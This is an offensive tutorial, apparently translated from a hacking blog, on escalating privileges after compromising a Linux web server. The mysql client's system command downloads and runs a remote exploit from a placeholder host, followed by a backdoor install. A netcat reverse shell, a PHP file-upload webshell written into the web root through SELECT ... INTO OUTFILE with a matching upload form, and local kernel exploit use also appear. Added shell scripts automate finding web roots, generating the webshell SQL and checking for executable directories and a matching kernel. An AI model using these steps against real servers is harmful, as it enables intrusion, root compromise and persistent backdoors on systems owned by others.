Privilege escalation using MySQL root
The mysql command-line client has a system command (short form \!) that runs a shell command; once you are logged in to MySQL as root you can use it to run whatever commands the permissions you already have allow. Keep in mind what system actually is: it is a client-side command, executed on the host where the mysql client runs and as the OS user running that client, not on the database server. So this is a technique for when you already have a mysql client session on the target box (from a webshell, for example).
Normally we follow the usual idea: get the MySQL root password, connect, create a table, write it out with INTO OUTFILE to get a webshell, and then escalate from there. Today let's do it a different way.
With the usual method you need the absolute path of the web root, which is not always easy to find: with a SQL injection an error message may reveal it, but not necessarily. With this method there is no need to hunt for the web path at all. Just execute
mysql> system vi /etc/httpd/conf/httpd.conf;
and you can read the web root straight out of the Apache config. Of course, the goal is not just to find the web path and drop a webshell in; we want to do other things, for example download an exploit, run it, get root, and then install a backdoor:
mysql> system wget http://www.xxx.com/xxxx;
mysql> system chmod +x xxxx;
mysql> system ./xxxx;
If the exploit works you are root at this point, and the rest is routine: if SSH is open, connect over SSH, enter the user name and password, and you're done.
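As an added example (not code from the original post), here is a small POSIX shell script that does what the author does by hand with system vi: it lists every DocumentRoot in an Apache httpd.conf, for the main server and for each VirtualHost. The httpd.conf it runs on is a constructed sample embedded in the script; on a real box you would point list_docroots at /etc/httpd/conf/httpd.conf, or run it from the mysql client with system sh find_docroot.sh. Files pulled in by Include directives (conf.d/*.conf) are not followed.

```sh
#!/bin/sh
# Added example (not from the original post): list every DocumentRoot in an
# Apache httpd.conf, the information the author reads by hand with
# "system vi /etc/httpd/conf/httpd.conf". From the mysql client:
#   mysql> system sh find_docroot.sh
# Limitation: Include'd files (e.g. conf.d/*.conf) are not followed.

# Print "<server> <document root>" per line: "(main)" for the main server,
# the ServerName (or "(unnamed vhost)") for each <VirtualHost> block.
# Usage: list_docroots <httpd.conf>
list_docroots() {
    awk '
        { sub("#.*", ""); sub(/[ \t]+$/, "") }          # drop comments, trailing blanks
        /^[ \t]*<VirtualHost/   { in_vh = 1; name = "(unnamed vhost)"; root = ""; next }
        /^[ \t]*<\/VirtualHost/ { if (root != "") print name, root; in_vh = 0; next }
        in_vh && $1 == "ServerName" { name = $2; next }
        $1 == "DocumentRoot" {
            r = $2; gsub(/"/, "", r)                     # strip optional quotes
            if (in_vh) root = r; else print "(main)", r
        }
    ' "$1"
}

# Constructed sample config (not a real server's file) used by the demo.
sample_httpd_conf() {
    cat <<'EOF'
ServerRoot "/etc/httpd"
Listen 80
DocumentRoot "/var/www/html"   # main server document root
<Directory "/var/www/html">
    AllowOverride None
</Directory>
NameVirtualHost *:80
<VirtualHost *:80>
    DocumentRoot "/var/www/virtual/example"
    ServerName www.example.com
</VirtualHost>
<VirtualHost *:80>
    ServerName shop.example.com
    DocumentRoot /var/www/virtual/shop
</VirtualHost>
EOF
}

# Demo on the sample. To use on a real file: list_docroots /etc/httpd/conf/httpd.conf
conf=$(mktemp)
sample_httpd_conf > "$conf"
list_docroots "$conf"
rm -f "$conf"
```

The sample prints three lines: the main server root and the two virtual hosts, each with its ServerName, so you can pick the directory that belongs to the site you are after instead of reading the whole file.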
Escalating from a low-privilege Linux account
First tried /tmp: created the file there, the back-connect shell from the shell directory, executed it, listened locally with nc, got the connection, ran whoami: wwwroot permissions.
Could cd up to the parent of the web root (/var/www/virtual/) and ls: the whole list of sites came out, and the target site's folder name was not hidden, but there was no permission to enter it.
Tried tar to pack it up: no permission. Tried packing the target site's directory files individually, but conn.config in its root was readable only by the target site's own account.
Tried cp on the target site's include directory; unexpectedly it could be copied, but nothing could be written back. Found the database configuration in it, which pointed to another server.
Backed up the database first with a PhpSpy shell:
Looked through some configuration information and accounts, but found no admin panel path or other sensitive information.
The scanner did not find the target's web folder; presumably it had been renamed.
Tried escalating from the cmdshell to user or root; could not view the Apache configuration directly; tried wget'ing a few exps, but none worked, presumably patched.
cp was possible, but gave no specific information.
Since the web account had no privileges, tried MySQL to see whether there was an escalation path there.
CREATE TABLE hackdn (spider BLOB);   -- creates the table hackdn
Then backed the table up to 1.php under the target path (a SELECT ... INTO OUTFILE). Found that the shell would not connect.
Copied it over and looked: the code had been broken up by escape characters (the quotes had been backslash-escaped).
So insert it with no quote marks at all:
<?copy($_FILES[myfile][tmp_name],$_FILES[myfile][name]);?>
After backing that up to the PHP file, save the following code locally as
1.html
<form enctype="multipart/form-data" action="http://www.webshell.cc/mysql_bak/1.php" method="POST">
<input name="myfile" type="file">
<input value="Submit" type="submit">
</form>
(The input name must be exactly myfile: $_FILES keys are case-sensitive, so a form field named MyFile would not reach $_FILES[myfile].)
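As an added example (not code from the original post), the following shell script builds the three SQL statements behind the "back up the table to 1.php" step: create the table, insert the quote-free PHP uploader from the post, and write it out with SELECT ... INTO OUTFILE. It refuses any payload or path containing a quote or backslash, which is exactly the character set that got escaped and broke the first attempt. The table and column names (hackdn, spider) are the post's; the target path /var/www/html/1.php is an assumption for the demo.

```sh
#!/bin/sh
# Added example (not from the original post): build the SQL that writes the
# author's quote-free PHP uploader to disk with SELECT ... INTO OUTFILE, which
# is what "backing up" the table through a PhpSpy shell does underneath.
# Table and column names (hackdn, spider) follow the post.

# Payload from the post. It deliberately contains no quote characters, so
# neither addslashes()/magic quotes in the shell nor a client's escaping can
# insert the backslashes that broke the first attempt.
UPLOADER_PHP='<?copy($_FILES[myfile][tmp_name],$_FILES[myfile][name]);?>'

# Succeed only if the string contains no single quote, double quote or backslash.
payload_is_quote_free() {
    case "$1" in
        *\'*|*\"*|*\\*) return 1 ;;
    esac
    return 0
}

# Print the statements to run. Usage: build_outfile_sql <payload> <absolute target path>
# Fails instead of emitting something the escaping would mangle on the way in.
build_outfile_sql() {
    payload=$1
    target=$2
    if ! payload_is_quote_free "$payload" || ! payload_is_quote_free "$target"; then
        echo "refusing: payload or path contains a quote or backslash" >&2
        return 1
    fi
    printf '%s\n' "CREATE TABLE hackdn (spider BLOB);"
    printf '%s\n' "INSERT INTO hackdn VALUES ('$payload');"
    printf '%s\n' "SELECT spider FROM hackdn INTO OUTFILE '$target';"
}

# Demo with the post's payload and an assumed web root path.
build_outfile_sql "$UPLOADER_PHP" /var/www/html/1.php
```

Things to check before running the output: INTO OUTFILE needs the FILE privilege, the file is created by the mysqld OS user (so that user must be able to write to the target directory), MySQL will not overwrite an existing file, and on servers with secure_file_priv set only that directory is allowed. On the PHP side, `<?` only works with short_open_tag enabled, and the unquoted array keys work but raise notices; both are why the post's payload looks the way it does.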
A simple Linux privilege escalation walkthrough
Got the shell, ready to escalate. First look at the Linux kernel:
uname -a
2.6.18-194.11.3.el5, a 2010 kernel, fine; CentOS release 5.5.
Then search Baidu or elsewhere for an exp; I had already collected one for the 2.6.18-194 kernel. Upload it to /tmp. Why that directory?
Because /tmp is normally writable and allows execution. Continuing.
Find an Internet-facing IP and listen on port 12666 (any other port works too). Here I use nc: nc -l -n -v -p 12666
Then point your shell at it.
A successful connection looks like the following.
Then go into /tmp:
cd /tmp, and look at the 2.6.18-194 exp uploaded earlier.
I have rwx on it: readable, writable and executable. If you do not, chmod -R 777 filename (chmod +x is enough, and 777 on a file in /tmp lets every other user on the box edit your exploit while it sits there).
My exp here is already compiled, so just run the overflow: ./2.6.18-194. If your exp is not compiled, build it yourself: gcc -o /tmp/filename /tmp/filename.c
Success... Linux privilege escalation really is quite simple; the key is whether an exp exists for the kernel. Done!
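Two checks worth scripting for the procedure above, as an added example that is not part of the original post: whether the directory you are about to upload the exploit into is really writable and executable (the reason the author gives for using /tmp; on a noexec mount ./exp fails with "Permission denied" whatever chmod says), and whether the running kernel release actually starts with the version the exp was built for. The directory list and the second kernel release strings in the demo are assumptions; the first, 2.6.18-194.11.3.el5, is the one from the post.

```sh
#!/bin/sh
# Added example (not from the original post): check that the directory you
# are about to upload an exploit into is both writable and executable, the
# property the author relies on when choosing /tmp. Also a helper to confirm
# the running kernel matches the exp you collected before you run it.

# Usage: probe_exec_dir <dir>   prints ok | noexec | unwritable
# Writes a tiny script into <dir>, tries to execute it, then removes it.
probe_exec_dir() {
    dir=$1
    if [ ! -d "$dir" ] || [ ! -w "$dir" ]; then
        echo unwritable; return 1
    fi
    probe=$(mktemp "$dir/.probe.XXXXXX") || { echo unwritable; return 1; }
    printf '#!/bin/sh\nexit 0\n' > "$probe"
    chmod +x "$probe"
    # Any failure to run the script (noexec mount is the usual one) is reported as noexec.
    if "$probe" 2>/dev/null; then result=ok; else result=noexec; fi
    rm -f "$probe"
    echo "$result"
    [ "$result" = ok ]
}

# Usage: kernel_matches <exp kernel prefix> [release]
# True when the release (default: uname -r) starts with the prefix the exp targets.
kernel_matches() {
    prefix=$1
    release=${2:-$(uname -r)}
    case "$release" in
        "$prefix"*) return 0 ;;
    esac
    return 1
}

# Demo: the usual candidate directories (assumed list), then the kernel check
# with the release string from the post.
for d in /tmp /var/tmp /dev/shm; do
    printf '%-9s %s\n' "$d" "$(probe_exec_dir "$d")"
done
echo "running kernel: $(uname -r)"
if kernel_matches 2.6.18-194 "2.6.18-194.11.3.el5"; then
    echo "2.6.18-194.11.3.el5 matches an exp built for 2.6.18-194"
fi
```

If every candidate directory comes back noexec, chmod 777 will not help; you need a writable directory on a mount without noexec (or to run the binary through the loader, which is outside this post). The kernel check only compares the release prefix; whether the box has the relevant fix backported is something uname cannot tell you, which is why the author's "presumably patched" exps failed.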